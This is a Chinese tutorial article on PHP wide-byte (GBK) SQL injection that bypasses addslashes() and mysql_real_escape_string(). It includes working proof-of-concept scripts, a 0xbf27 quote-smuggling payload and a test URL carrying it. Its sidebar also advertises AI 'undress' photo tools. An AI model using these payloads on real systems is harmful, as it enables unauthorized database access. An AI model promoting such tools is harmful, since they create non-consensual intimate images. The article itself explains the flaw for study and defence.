Web渗透:PHP字符编码绕过漏洞总结
其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。 该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过addslashes() 转换后变为 0xbf5c27
其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes() 转换后变为0xbf5c27,前面的0xbf5c是个有
效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了。
mysql_real_escape_string() 也存在相同的问题,只不过相比 addslashes() 它考虑到了用什么字符集来处理,因此可以用相
应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。
方法一:
修改mysql配置文件my.cnf
[client]
default-character-set=GBK
方法二:
在建立连接时使用:SET CHARACTER SET 'GBK'
例:mysql_query("SET CHARACTER SET 'gbk'", $c);
问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞
下面是来自http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的测试代码
<?<span>php
</span><span>$c</span> = <span>mysql_connect</span>("localhost", "user", "pass"<span>);
</span><span>mysql_select_db</span>("database", <span>$c</span><span>);
</span><span>//</span><span> change our character set</span>
<span>mysql_query</span>("SET CHARACTER SET 'gbk'", <span>$c</span><span>);
</span><span>//</span><span> create demo table</span>
<span>mysql_query</span>("<span>CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'</span>", <span>$c</span><span>);
</span><span>mysql_query</span>("INSERT INTO users VALUES('foo','bar'), ('baz','test')", <span>$c</span><span>);
</span><span>//</span><span> now the exploit code</span>
<span>$_POST</span>['username'] = <span>chr</span>(0xbf) . <span>chr</span>(0x27) . ' OR username = username /*'<span>;
</span><span>$_POST</span>['password'] = 'anything'<span>;
</span><span>//</span><span> Proper escaping, we should be safe, right?</span>
<span>$user</span> = <span>mysql_real_escape_string</span>(<span>$_POST</span>['username'], <span>$c</span><span>);
</span><span>$passwd</span> = <span>mysql_real_escape_string</span>(<span>$_POST</span>['password'], <span>$c</span><span>);
</span><span>$sql</span> = "SELECT * FROM users WHERE username = '{<span>$user</span>}' AND password = '{<span>$passwd</span>}'"<span>;
</span><span>$res</span> = <span>mysql_query</span>(<span>$sql</span>, <span>$c</span><span>);
</span><span>echo</span> <span>mysql_num_rows</span>(<span>$res</span>); <span>//</span><span> will print 2, indicating that we were able to fetch all records</span>
?>纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞,而mysql_real_escape_string() 是在不知
道字符集的情况下用默认字符集处理产生漏洞的。
下面再来分析下国内最近漏洞产生的原因。
问题出现在一些字符转换函数上,例如mb_convert_encoding()和iconv()等。
发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后,又经过一些字符转换函数变为0×808027,而使得经过
addslashes() 加上的""失效,这样单引号就又发挥作用了。这就造成了字符注入漏洞。
根据80sec的说明,iconv()没有该问题,但经我用0xbf27测试
<span>$id1</span>=mb_convert_encoding(<span>$_GET</span>['id'], 'utf-8', 'gbk'<span>);
</span><span>$id2</span>=<span>iconv</span>('gbk//IGNORE', 'utf-8', <span>$_GET</span>['id'<span>]);
</span><span>$id3</span>=<span>iconv</span>('gbk', 'utf-8', <span>$_GET</span>['id']);这些在GPC开启的情况下还是会产生字符注入漏洞,测试代码如下:
<?<span>php
</span><span>$c</span> = <span>mysql_connect</span>("localhost", "user", "pass"<span>);
</span><span>mysql_select_db</span>("database", <span>$c</span><span>);
</span><span>//</span><span> change our character set</span>
<span>mysql_query</span>("SET CHARACTER SET 'gbk'", <span>$c</span><span>);
</span><span>//</span><span> create demo table</span>
<span>mysql_query</span>("<span>CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'</span>", <span>$c</span><span>);
</span><span>mysql_query</span>("INSERT INTO users VALUES('foo','bar'), ('baz','test')", <span>$c</span><span>);
</span><span>//</span><span> now the exploit code
//$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');</span>
<span>$id2</span>=<span>iconv</span>('gbk//IGNORE', 'utf-8', <span>$_GET</span>['id'<span>]);
</span><span>//</span><span>$id3=iconv('gbk', 'utf-8', $_GET['id']);</span>
<span>$sql</span> = "SELECT * FROM users WHERE username = '{<span>$id2</span>}' AND password = 'password'"<span>;
</span><span>$res</span> = <span>mysql_query</span>(<span>$sql</span>, <span>$c</span><span>);
</span><span>echo</span> <span>mysql_num_rows</span>(<span>$res</span>); <span>//</span><span> will print 2, indicating that we were able to fetch all records</span>
?>测试情况:http://www.safe3.cn/test.php?id=�' OR username = username /*
后记,这里不光是�,其它许多字符也可以造成同样漏洞,大家可以自己做个测试的查下,这里有zwell文章提到的一个分析
http://hackme.ntobjectives.com/sql_inject/login_addslashes.php 。编码的问题在xss中也有利用价值,详情请看我
Bypassing script filters with variable-width encodings 。
热AI工具
Undresser.AI Undress
人工智能驱动的应用程序,用于创建逼真的裸体照片
AI Clothes Remover
用于从照片中去除衣服的在线人工智能工具。
Undress AI Tool
免费脱衣服图片
Clothoff.io
AI脱衣机
Video Face Swap
使用我们完全免费的人工智能换脸工具轻松在任何视频中换脸!
热门文章
热工具
记事本++7.3.1
好用且免费的代码编辑器
SublimeText3汉化版
中文版,非常好用
禅工作室 13.0.1
功能强大的PHP集成开发环境
Dreamweaver CS6
视觉化网页开发工具
SublimeText3 Mac版
神级代码编辑软件(SublimeText3)
PHP与Python:了解差异
Apr 11, 2025 am 12:15 AM
PHP和Python各有优势,选择应基于项目需求。1.PHP适合web开发,语法简单,执行效率高。2.Python适用于数据科学和机器学习,语法简洁,库丰富。
PHP:网络开发的关键语言
Apr 13, 2025 am 12:08 AM
PHP是一种广泛应用于服务器端的脚本语言,特别适合web开发。1.PHP可以嵌入HTML,处理HTTP请求和响应,支持多种数据库。2.PHP用于生成动态网页内容,处理表单数据,访问数据库等,具有强大的社区支持和开源资源。3.PHP是解释型语言,执行过程包括词法分析、语法分析、编译和执行。4.PHP可以与MySQL结合用于用户注册系统等高级应用。5.调试PHP时,可使用error_reporting()和var_dump()等函数。6.优化PHP代码可通过缓存机制、优化数据库查询和使用内置函数。7
PHP和Python:比较两种流行的编程语言
Apr 14, 2025 am 12:13 AM
PHP和Python各有优势,选择依据项目需求。1.PHP适合web开发,尤其快速开发和维护网站。2.Python适用于数据科学、机器学习和人工智能,语法简洁,适合初学者。
PHP行动:现实世界中的示例和应用程序
Apr 14, 2025 am 12:19 AM
PHP在电子商务、内容管理系统和API开发中广泛应用。1)电子商务:用于购物车功能和支付处理。2)内容管理系统:用于动态内容生成和用户管理。3)API开发:用于RESTfulAPI开发和API安全性。通过性能优化和最佳实践,PHP应用的效率和可维护性得以提升。
PHP的持久相关性:它还活着吗?
Apr 14, 2025 am 12:12 AM
PHP仍然具有活力,其在现代编程领域中依然占据重要地位。1)PHP的简单易学和强大社区支持使其在Web开发中广泛应用;2)其灵活性和稳定性使其在处理Web表单、数据库操作和文件处理等方面表现出色;3)PHP不断进化和优化,适用于初学者和经验丰富的开发者。
PHP和Python:解释了不同的范例
Apr 18, 2025 am 12:26 AM
PHP主要是过程式编程,但也支持面向对象编程(OOP);Python支持多种范式,包括OOP、函数式和过程式编程。PHP适合web开发,Python适用于多种应用,如数据分析和机器学习。
PHP与其他语言:比较
Apr 13, 2025 am 12:19 AM
PHP适合web开发,特别是在快速开发和处理动态内容方面表现出色,但不擅长数据科学和企业级应用。与Python相比,PHP在web开发中更具优势,但在数据科学领域不如Python;与Java相比,PHP在企业级应用中表现较差,但在web开发中更灵活;与JavaScript相比,PHP在后端开发中更简洁,但在前端开发中不如JavaScript。
PHP和Python:代码示例和比较
Apr 15, 2025 am 12:07 AM
PHP和Python各有优劣,选择取决于项目需求和个人偏好。1.PHP适合快速开发和维护大型Web应用。2.Python在数据科学和机器学习领域占据主导地位。
